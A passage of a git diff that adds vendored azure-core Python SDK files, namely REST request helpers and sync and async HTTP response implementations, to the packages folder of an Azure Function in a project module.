async def read(self) -> bytes: + """Read the response's bytes into memory. + + :return: The response's bytes + :rtype: bytes + """ + if not self._content: + self._stream_download_check() + self._content = await self._internal_response.read() + await self._set_read_checks() + return _aiohttp_body_helper(self) + + async def close(self) -> None: + """Close the response. + + :return: None + :rtype: None + """ + if not self.is_closed: + self._is_closed = True + self._internal_response.close() + await asyncio.sleep(0) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_helpers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_helpers.py new file mode 100644 index 0000000..2234a8b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_helpers.py @@ -0,0 +1,369 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import copy +import codecs +import cgi +from json import dumps +from typing import ( + Optional, + Union, + Mapping, + Sequence, + Tuple, + IO, + Any, + Dict, + Iterable, + MutableMapping, + AsyncIterable +) +import xml.etree.ElementTree as ET +import six +try: + binary_type = str + from urlparse import urlparse # type: ignore +except ImportError: + binary_type = bytes # type: ignore + from urllib.parse import urlparse +from azure.core.serialization import AzureJSONEncoder +from ..utils._pipeline_transport_rest_shared import ( + _format_parameters_helper, + _pad_attr_name, + _prepare_multipart_body_helper, + _serialize_request, + _format_data_helper, +) + +################################### TYPES SECTION ######################### + +PrimitiveData = Optional[Union[str, int, float, bool]] + + +ParamsType = Mapping[str, Union[PrimitiveData, Sequence[PrimitiveData]]] + +FileContent = Union[str, bytes, IO[str], IO[bytes]] +FileType = Tuple[Optional[str], FileContent] + +FilesType = Union[ + Mapping[str, FileType], + Sequence[Tuple[str, FileType]] +] + +ContentTypeBase = Union[str, bytes, Iterable[bytes]] +ContentType = Union[str, bytes, Iterable[bytes], AsyncIterable[bytes]] + +########################### HELPER SECTION ################################# + +def _verify_data_object(name, value): + if not isinstance(name, six.string_types): + raise TypeError( + "Invalid type for data name. Expected str, got {}: {}".format( + type(name), name + ) + ) + if value is not None and not isinstance(value, (six.string_types, bytes, int, float)): + raise TypeError( + "Invalid type for data value. Expected primitive type, got {}: {}".format( + type(name), name + ) + ) + +def set_urlencoded_body(data, has_files): + body = {} + default_headers = {} + for f, d in data.items(): + if not d: + continue + if isinstance(d, list): + for item in d: + _verify_data_object(f, item) + else: + _verify_data_object(f, d) + body[f] = d + if not has_files: + # little hacky, but for files we don't send a content type with + # boundary so requests / aiohttp etc deal with it + default_headers["Content-Type"] = "application/x-www-form-urlencoded" + return default_headers, body + +def set_multipart_body(files): + formatted_files = { + f: _format_data_helper(d) for f, d in files.items() if d is not None + } + return {}, formatted_files + +def set_xml_body(content): + headers = {} + bytes_content = ET.tostring(content, encoding="utf8") + body = bytes_content.replace(b"encoding='utf8'", b"encoding='utf-8'") + if body: + headers["Content-Length"] = str(len(body)) + return headers, body + +def set_content_body(content: Any) -> Tuple[MutableMapping[str, str], Optional[ContentTypeBase]]: + headers: MutableMapping[str, str] = {} + + if isinstance(content, ET.Element): + # XML body + return set_xml_body(content) + if isinstance(content, (six.string_types, bytes)): + headers = {} + body = content + if isinstance(content, six.string_types): + headers["Content-Type"] = "text/plain" + if body: + headers["Content-Length"] = str(len(body)) + return headers, body + if any(hasattr(content, attr) for attr in ["read", "__iter__", "__aiter__"]): + return headers, content + raise TypeError( + "Unexpected type for 'content': '{}'. ".format(type(content)) + + "We expect 'content' to either be str, bytes, a open file-like object or an iterable/asynciterable." + ) + +def set_json_body(json): + # type: (Any) -> Tuple[Dict[str, str], Any] + headers = {"Content-Type": "application/json"} + if hasattr(json, "read"): + content_headers, body = set_content_body(json) + headers.update(content_headers) + else: + body = dumps(json, cls=AzureJSONEncoder) + headers.update({"Content-Length": str(len(body))}) + return headers, body + +def lookup_encoding(encoding): + # type: (str) -> bool + # including check for whether encoding is known taken from httpx + try: + codecs.lookup(encoding) + return True + except LookupError: + return False + +def get_charset_encoding(response): + # type: (...) -> Optional[str] + content_type = response.headers.get("Content-Type") + + if not content_type: + return None + _, params = cgi.parse_header(content_type) + encoding = params.get('charset') # -> utf-8 + if encoding is None or not lookup_encoding(encoding): + return None + return encoding + +def decode_to_text(encoding, content): + # type: (Optional[str], bytes) -> str + if not content: + return "" + if encoding == "utf-8": + encoding = "utf-8-sig" + if encoding: + return content.decode(encoding) + return codecs.getincrementaldecoder("utf-8-sig")(errors="replace").decode(content) + +class HttpRequestBackcompatMixin(object): + + def __getattr__(self, attr): + backcompat_attrs = [ + "files", + "data", + "multipart_mixed_info", + "query", + "body", + "format_parameters", + "set_streamed_data_body", + "set_text_body", + "set_xml_body", + "set_json_body", + "set_formdata_body", + "set_bytes_body", + "set_multipart_mixed", + "prepare_multipart_body", + "serialize", + ] + attr = _pad_attr_name(attr, backcompat_attrs) + return self.__getattribute__(attr) + + def __setattr__(self, attr, value): + backcompat_attrs = [ + "multipart_mixed_info", + "files", + "data", + "body", + ] + attr = _pad_attr_name(attr, backcompat_attrs) + super(HttpRequestBackcompatMixin, self).__setattr__(attr, value) + + @property + def _multipart_mixed_info(self): + """DEPRECATED: Information used to make multipart mixed requests. + This is deprecated and will be removed in a later release. + """ + try: + return self._multipart_mixed_info_val + except AttributeError: + return None + + @_multipart_mixed_info.setter + def _multipart_mixed_info(self, val): + """DEPRECATED: Set information to make multipart mixed requests. + This is deprecated and will be removed in a later release. + """ + self._multipart_mixed_info_val = val + + @property + def _query(self): + """DEPRECATED: Query parameters passed in by user + This is deprecated and will be removed in a later release. + """ + query = urlparse(self.url).query + if query: + return {p[0]: p[-1] for p in [p.partition("=") for p in query.split("&")]} + return {} + + @property + def _body(self): + """DEPRECATED: Body of the request. You should use the `content` property instead + This is deprecated and will be removed in a later release. + """ + return self._data + + @_body.setter + def _body(self, val): + """DEPRECATED: Set the body of the request + This is deprecated and will be removed in a later release. + """ + self._data = val + + def _format_parameters(self, params): + """DEPRECATED: Format the query parameters + This is deprecated and will be removed in a later release. + You should pass the query parameters through the kwarg `params` + instead. + """ + return _format_parameters_helper(self, params) + + def _set_streamed_data_body(self, data): + """DEPRECATED: Set the streamed request body. + This is deprecated and will be removed in a later release. + You should pass your stream content through the `content` kwarg instead + """ + if not isinstance(data, binary_type) and not any( + hasattr(data, attr) for attr in ["read", "__iter__", "__aiter__"] + ): + raise TypeError( + "A streamable data source must be an open file-like object or iterable." + ) + headers = self._set_body(content=data) + self._files = None + self.headers.update(headers) + + def _set_text_body(self, data): + """DEPRECATED: Set the text body + This is deprecated and will be removed in a later release. + You should pass your text content through the `content` kwarg instead + """ + headers = self._set_body(content=data) + self.headers.update(headers) + self._files = None + + def _set_xml_body(self, data): + """DEPRECATED: Set the xml body. + This is deprecated and will be removed in a later release. + You should pass your xml content through the `content` kwarg instead + """ + headers = self._set_body(content=data) + self.headers.update(headers) + self._files = None + + def _set_json_body(self, data): + """DEPRECATED: Set the json request body. + This is deprecated and will be removed in a later release. + You should pass your json content through the `json` kwarg instead + """ + headers = self._set_body(json=data) + self.headers.update(headers) + self._files = None + + def _set_formdata_body(self, data=None): + """DEPRECATED: Set the formrequest body. + This is deprecated and will be removed in a later release. + You should pass your stream content through the `files` kwarg instead + """ + if data is None: + data = {} + content_type = self.headers.pop("Content-Type", None) if self.headers else None + + if content_type and content_type.lower() == "application/x-www-form-urlencoded": + headers = self._set_body(data=data) + self._files = None + else: # Assume "multipart/form-data" + headers = self._set_body(files=data) + self._data = None + self.headers.update(headers) + + def _set_bytes_body(self, data): + """DEPRECATED: Set the bytes request body. + This is deprecated and will be removed in a later release. + You should pass your bytes content through the `content` kwarg instead + """ + headers = self._set_body(content=data) + # we don't want default Content-Type + # in 2.7, byte strings are still strings, so they get set with text/plain content type + + headers.pop("Content-Type", None) + self.headers.update(headers) + self._files = None + + def _set_multipart_mixed(self, *requests, **kwargs): + """DEPRECATED: Set the multipart mixed info. + This is deprecated and will be removed in a later release. + """ + self.multipart_mixed_info = ( + requests, + kwargs.pop("policies", []), + kwargs.pop("boundary", None), + kwargs + ) + + def _prepare_multipart_body(self, content_index=0): + """DEPRECATED: Prepare your request body for multipart requests. + This is deprecated and will be removed in a later release. + """ + return _prepare_multipart_body_helper(self, content_index) + + def _serialize(self): + """DEPRECATED: Serialize this request using application/http spec. + This is deprecated and will be removed in a later release. + :rtype: bytes + """ + return _serialize_request(self) + + def _add_backcompat_properties(self, request, memo): + """While deepcopying, we also need to add the private backcompat attrs""" + request._multipart_mixed_info = copy.deepcopy(self._multipart_mixed_info, memo) # pylint: disable=protected-access diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl.py new file mode 100644 index 0000000..50fcd95 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl.py @@ -0,0 +1,465 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from json import loads +from typing import cast, TYPE_CHECKING +from six.moves.http_client import HTTPResponse as _HTTPResponse +from ._helpers import ( + get_charset_encoding, + decode_to_text, +) +from ..exceptions import HttpResponseError, ResponseNotReadError, StreamConsumedError, StreamClosedError +try: + from ._rest_py3 import ( + _HttpResponseBase, + HttpResponse as _HttpResponse, + HttpRequest as _HttpRequest + ) +except (SyntaxError, ImportError): + from ._rest import ( # type: ignore + _HttpResponseBase, + HttpResponse as _HttpResponse, + HttpRequest as _HttpRequest + ) +from ..utils._utils import case_insensitive_dict +from ..utils._pipeline_transport_rest_shared import ( + _pad_attr_name, + BytesIOSocket, + _decode_parts_helper, + _get_raw_parts_helper, + _parts_helper, +) + +if TYPE_CHECKING: + from typing import Any, Optional, Iterator, MutableMapping, Callable + +class _HttpResponseBackcompatMixinBase(object): + """Base Backcompat mixin for responses. + + This mixin is used by both sync and async HttpResponse + backcompat mixins. + """ + + def __getattr__(self, attr): + backcompat_attrs = [ + "body", + "internal_response", + "block_size", + "stream_download", + ] + attr = _pad_attr_name(attr, backcompat_attrs) + return self.__getattribute__(attr) + + def __setattr__(self, attr, value): + backcompat_attrs = [ + "block_size", + "internal_response", + "request", + "status_code", + "headers", + "reason", + "content_type", + "stream_download", + ] + attr = _pad_attr_name(attr, backcompat_attrs) + super(_HttpResponseBackcompatMixinBase, self).__setattr__(attr, value) + + def _body(self): + """DEPRECATED: Get the response body. + This is deprecated and will be removed in a later release. + You should get it through the `content` property instead + """ + self.read() + return self.content # pylint: disable=no-member + + def _decode_parts(self, message, http_response_type, requests): + """Helper for _decode_parts. + + Rebuild an HTTP response from pure string. + """ + def _deserialize_response( + http_response_as_bytes, http_request, http_response_type + ): + local_socket = BytesIOSocket(http_response_as_bytes) + response = _HTTPResponse(local_socket, method=http_request.method) + response.begin() + return http_response_type(request=http_request, internal_response=response) + + return _decode_parts_helper( + self, + message, + http_response_type or RestHttpClientTransportResponse, + requests, + _deserialize_response + ) + + def _get_raw_parts(self, http_response_type=None): + """Helper for get_raw_parts + + Assuming this body is multipart, return the iterator or parts. + + If parts are application/http use http_response_type or HttpClientTransportResponse + as enveloppe. + """ + return _get_raw_parts_helper( + self, http_response_type or RestHttpClientTransportResponse + ) + + def _stream_download(self, pipeline, **kwargs): + """DEPRECATED: Generator for streaming request body data. + This is deprecated and will be removed in a later release. + You should use `iter_bytes` or `iter_raw` instead. + :rtype: iterator[bytes] + """ + return self._stream_download_generator(pipeline, self, **kwargs) + +class HttpResponseBackcompatMixin(_HttpResponseBackcompatMixinBase): + """Backcompat mixin for sync HttpResponses""" + + def __getattr__(self, attr): + backcompat_attrs = ["parts"] + attr = _pad_attr_name(attr, backcompat_attrs) + return super(HttpResponseBackcompatMixin, self).__getattr__(attr) + + def parts(self): + """DEPRECATED: Assuming the content-type is multipart/mixed, will return the parts as an async iterator. + This is deprecated and will be removed in a later release. + :rtype: Iterator + :raises ValueError: If the content is not multipart/mixed + """ + return _parts_helper(self) + + +class _HttpResponseBaseImpl(_HttpResponseBase, _HttpResponseBackcompatMixinBase): # pylint: disable=too-many-instance-attributes + """Base Implementation class for azure.core.rest.HttpRespone and azure.core.rest.AsyncHttpResponse + + Since the rest responses are abstract base classes, we need to implement them for each of our transport + responses. This is the base implementation class shared by HttpResponseImpl and AsyncHttpResponseImpl. + The transport responses will be built on top of HttpResponseImpl and AsyncHttpResponseImpl + + :keyword request: The request that led to the response + :type request: ~azure.core.rest.HttpRequest + :keyword any internal_response: The response we get directly from the transport. For example, for our requests + transport, this will be a requests.Response. + :keyword optional[int] block_size: The block size we are using in our transport + :keyword int status_code: The status code of the response + :keyword str reason: The HTTP reason + :keyword str content_type: The content type of the response + :keyword MutableMapping[str, str] headers: The response headers + :keyword Callable stream_download_generator: The stream download generator that we use to stream the response. + """ + + def __init__(self, **kwargs): + # type: (Any) -> None + super(_HttpResponseBaseImpl, self).__init__() + self._request = kwargs.pop("request") + self._internal_response = kwargs.pop("internal_response") + self._block_size = kwargs.pop("block_size", None) or 4096 # type: int + self._status_code = kwargs.pop("status_code") # type: int + self._reason = kwargs.pop("reason") # type: str + self._content_type = kwargs.pop("content_type") # type: str + self._headers = kwargs.pop("headers") # type: MutableMapping[str, str] + self._stream_download_generator = kwargs.pop("stream_download_generator") # type: Callable + self._is_closed = False + self._is_stream_consumed = False + self._json = None # this is filled in ContentDecodePolicy, when we deserialize + self._content = None # type: Optional[bytes] + self._text = None # type: Optional[str] + + @property + def request(self): + # type: (...) -> _HttpRequest + """The request that resulted in this response. + + :rtype: ~azure.core.rest.HttpRequest + """ + return self._request + + @property + def url(self): + # type: (...) -> str + """The URL that resulted in this response. + + :rtype: str + """ + return self.request.url + + @property + def is_closed(self): + # type: (...) -> bool + """Whether the network connection has been closed yet. + + :rtype: bool + """ + return self._is_closed + + @property + def is_stream_consumed(self): + # type: (...) -> bool + """Whether the stream has been consumed""" + return self._is_stream_consumed + + @property + def status_code(self): + # type: (...) -> int + """The status code of this response. + + :rtype: int + """ + return self._status_code + + @property + def headers(self): + # type: (...) -> MutableMapping[str, str] + """The response headers. + + :rtype: MutableMapping[str, str] + """ + return self._headers + + @property + def content_type(self): + # type: (...) -> Optional[str] + """The content type of the response. + + :rtype: optional[str] + """ + return self._content_type + + @property + def reason(self): + # type: (...) -> str + """The reason phrase for this response. + + :rtype: str + """ + return self._reason + + @property + def encoding(self): + # type: (...) -> Optional[str] + """Returns the response encoding. + + :return: The response encoding. We either return the encoding set by the user, + or try extracting the encoding from the response's content type. If all fails, + we return `None`. + :rtype: optional[str] + """ + try: + return self._encoding + except AttributeError: + self._encoding = get_charset_encoding(self) # type: Optional[str] + return self._encoding + + @encoding.setter + def encoding(self, value): + # type: (str) -> None + """Sets the response encoding""" + self._encoding = value + self._text = None # clear text cache + self._json = None # clear json cache as well + + def text(self, encoding=None): + # type: (Optional[str]) -> str + """Returns the response body as a string + + :param optional[str] encoding: The encoding you want to decode the text with. Can + also be set independently through our encoding property + :return: The response's content decoded as a string. + """ + if encoding: + return decode_to_text(encoding, self.content) + if self._text: + return self._text + self._text = decode_to_text(self.encoding, self.content) + return self._text + + def json(self): + # type: (...) -> Any + """Returns the whole body as a json object. + + :return: The JSON deserialized response body + :rtype: any + :raises json.decoder.JSONDecodeError or ValueError (in python 2.7) if object is not JSON decodable: + """ + # this will trigger errors if response is not read in + self.content # pylint: disable=pointless-statement + if not self._json: + self._json = loads(self.text()) + return self._json + + def _stream_download_check(self): + if self.is_stream_consumed: + raise StreamConsumedError(self) + if self.is_closed: + raise StreamClosedError(self) + + self._is_stream_consumed = True + + def raise_for_status(self): + # type: (...) -> None + """Raises an HttpResponseError if the response has an error status code. + + If response is good, does nothing. + """ + if cast(int, self.status_code) >= 400: + raise HttpResponseError(response=self) + + @property + def content(self): + # type: (...) -> bytes + """Return the response's content in bytes.""" + if self._content is None: + raise ResponseNotReadError(self) + return self._content + + def __repr__(self): + # type: (...) -> str + content_type_str = ( + ", Content-Type: {}".format(self.content_type) if self.content_type else "" + ) + return "".format( + self.status_code, self.reason, content_type_str + ) + +class HttpResponseImpl(_HttpResponseBaseImpl, _HttpResponse, HttpResponseBackcompatMixin): + """HttpResponseImpl built on top of our HttpResponse protocol class. + + Since ~azure.core.rest.HttpResponse is an abstract base class, we need to + implement HttpResponse for each of our transports. This is an implementation + that each of the sync transport responses can be built on. + + :keyword request: The request that led to the response + :type request: ~azure.core.rest.HttpRequest + :keyword any internal_response: The response we get directly from the transport. For example, for our requests + transport, this will be a requests.Response. + :keyword optional[int] block_size: The block size we are using in our transport + :keyword int status_code: The status code of the response + :keyword str reason: The HTTP reason + :keyword str content_type: The content type of the response + :keyword MutableMapping[str, str] headers: The response headers + :keyword Callable stream_download_generator: The stream download generator that we use to stream the response. + """ + + def __enter__(self): + # type: (...) -> HttpResponseImpl + return self + + def close(self): + # type: (...) -> None + if not self.is_closed: + self._is_closed = True + self._internal_response.close() + + def __exit__(self, *args): + # type: (...) -> None + self.close() + + def _set_read_checks(self): + self._is_stream_consumed = True + self.close() + + def read(self): + # type: (...) -> bytes + """ + Read the response's bytes. + + """ + if self._content is None: + self._content = b"".join(self.iter_bytes()) + self._set_read_checks() + return self.content + + def iter_bytes(self, **kwargs): + # type: (Any) -> Iterator[bytes] + """Iterates over the response's bytes. Will decompress in the process. + + :return: An iterator of bytes from the response + :rtype: Iterator[str] + """ + if self._content is not None: + chunk_size = cast(int, self._block_size) + for i in range(0, len(self.content), chunk_size): + yield self.content[i : i + chunk_size] + else: + self._stream_download_check() + for part in self._stream_download_generator( + response=self, + pipeline=None, + decompress=True, + ): + yield part + self.close() + + def iter_raw(self, **kwargs): + # type: (Any) -> Iterator[bytes] + """Iterates over the response's bytes. Will not decompress in the process. + + :return: An iterator of bytes from the response + :rtype: Iterator[str] + """ + self._stream_download_check() + for part in self._stream_download_generator( + response=self, pipeline=None, decompress=False + ): + yield part + self.close() + +class _RestHttpClientTransportResponseBackcompatBaseMixin(_HttpResponseBackcompatMixinBase): + + def body(self): + if self._content is None: + self._content = self.internal_response.read() + return self.content + +class _RestHttpClientTransportResponseBase(_HttpResponseBaseImpl, _RestHttpClientTransportResponseBackcompatBaseMixin): + + def __init__(self, **kwargs): + internal_response = kwargs.pop("internal_response") + headers = case_insensitive_dict(internal_response.getheaders()) + super(_RestHttpClientTransportResponseBase, self).__init__( + internal_response=internal_response, + status_code=internal_response.status, + reason=internal_response.reason, + headers=headers, + content_type=headers.get("Content-Type"), + stream_download_generator=None, + **kwargs + ) + +class RestHttpClientTransportResponse(_RestHttpClientTransportResponseBase, HttpResponseImpl): + """Create a Rest HTTPResponse from an http.client response. + """ + + def iter_bytes(self, **kwargs): + raise TypeError("We do not support iter_bytes for this transport response") + + def iter_raw(self, **kwargs): + raise TypeError("We do not support iter_raw for this transport response") + + def read(self): + if self._content is None: + self._content = self._internal_response.read() + return self._content diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl_async.py new file mode 100644 index 0000000..7bfc568 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl_async.py @@ -0,0 +1,157 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import Any, AsyncIterator +from ._rest_py3 import AsyncHttpResponse as _AsyncHttpResponse +from ._http_response_impl import ( + _HttpResponseBaseImpl, _HttpResponseBackcompatMixinBase, _RestHttpClientTransportResponseBase +) +from ..utils._pipeline_transport_rest_shared import _pad_attr_name +from ..utils._pipeline_transport_rest_shared_async import _PartGenerator + + +class AsyncHttpResponseBackcompatMixin(_HttpResponseBackcompatMixinBase): + """Backcompat mixin for async responses""" + + def __getattr__(self, attr): + backcompat_attrs = ["parts"] + attr = _pad_attr_name(attr, backcompat_attrs) + return super().__getattr__(attr) + + def parts(self): + """DEPRECATED: Assuming the content-type is multipart/mixed, will return the parts as an async iterator. + This is deprecated and will be removed in a later release. + :rtype: AsyncIterator + :raises ValueError: If the content is not multipart/mixed + """ + if not self.content_type or not self.content_type.startswith("multipart/mixed"): + raise ValueError( + "You can't get parts if the response is not multipart/mixed" + ) + + return _PartGenerator(self, default_http_response_type=RestAsyncHttpClientTransportResponse) + +class AsyncHttpResponseImpl(_HttpResponseBaseImpl, _AsyncHttpResponse, AsyncHttpResponseBackcompatMixin): + """AsyncHttpResponseImpl built on top of our HttpResponse protocol class. + + Since ~azure.core.rest.AsyncHttpResponse is an abstract base class, we need to + implement HttpResponse for each of our transports. This is an implementation + that each of the sync transport responses can be built on. + + :keyword request: The request that led to the response + :type request: ~azure.core.rest.HttpRequest + :keyword any internal_response: The response we get directly from the transport. For example, for our requests + transport, this will be a requests.Response. + :keyword optional[int] block_size: The block size we are using in our transport + :keyword int status_code: The status code of the response + :keyword str reason: The HTTP reason + :keyword str content_type: The content type of the response + :keyword MutableMapping[str, str] headers: The response headers + :keyword Callable stream_download_generator: The stream download generator that we use to stream the response. + """ + + async def _set_read_checks(self): + self._is_stream_consumed = True + await self.close() + + async def read(self) -> bytes: + """Read the response's bytes into memory. + + :return: The response's bytes + :rtype: bytes + """ + if self._content is None: + parts = [] + async for part in self.iter_bytes(): + parts.append(part) + self._content = b"".join(parts) + await self._set_read_checks() + return self._content + + async def iter_raw(self, **kwargs: Any) -> AsyncIterator[bytes]: + """Asynchronously iterates over the response's bytes. Will not decompress in the process + :return: An async iterator of bytes from the response + :rtype: AsyncIterator[bytes] + """ + self._stream_download_check() + async for part in self._stream_download_generator( + response=self, pipeline=None, decompress=False + ): + yield part + await self.close() + + async def iter_bytes(self, **kwargs: Any) -> AsyncIterator[bytes]: + """Asynchronously iterates over the response's bytes. Will decompress in the process + :return: An async iterator of bytes from the response + :rtype: AsyncIterator[bytes] + """ + if self._content is not None: + for i in range(0, len(self.content), self._block_size): + yield self.content[i : i + self._block_size] + else: + self._stream_download_check() + async for part in self._stream_download_generator( + response=self, + pipeline=None, + decompress=True + ): + yield part + await self.close() + + async def close(self) -> None: + """Close the response. + + :return: None + :rtype: None + """ + if not self.is_closed: + self._is_closed = True + await self._internal_response.close() + + async def __aexit__(self, *args) -> None: + await self.close() + + def __repr__(self) -> str: + content_type_str = ( + ", Content-Type: {}".format(self.content_type) if self.content_type else "" + ) + return "".format( + self.status_code, self.reason, content_type_str + ) + +class RestAsyncHttpClientTransportResponse(_RestHttpClientTransportResponseBase, AsyncHttpResponseImpl): + """Create a Rest HTTPResponse from an http.client response. + """ + + async def iter_bytes(self, **kwargs): + raise TypeError("We do not support iter_bytes for this transport response") + + async def iter_raw(self, **kwargs): + raise TypeError("We do not support iter_raw for this transport response") + + async def read(self): + if self._content is None: + self._content = self._internal_response.read() + return self._content diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_asyncio.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_asyncio.py new file mode 100644 index 0000000..661a0ac --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_asyncio.py @@ -0,0 +1,50 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import asyncio +from ._http_response_impl_async import AsyncHttpResponseImpl +from ._requests_basic import _RestRequestsTransportResponseBase +from ..pipeline.transport._requests_asyncio import AsyncioStreamDownloadGenerator + +class RestAsyncioRequestsTransportResponse(AsyncHttpResponseImpl, _RestRequestsTransportResponseBase): # type: ignore + """Asynchronous streaming of data from the response. + """ + + def __init__(self, **kwargs): + super().__init__( + stream_download_generator=AsyncioStreamDownloadGenerator, + **kwargs + ) + + async def close(self) -> None: + """Close the response. + + :return: None + :rtype: None + """ + if not self.is_closed: + self._is_closed = True + self._internal_response.close() + await asyncio.sleep(0) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_basic.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_basic.py new file mode 100644 index 0000000..7ee6629 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_basic.py @@ -0,0 +1,98 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE 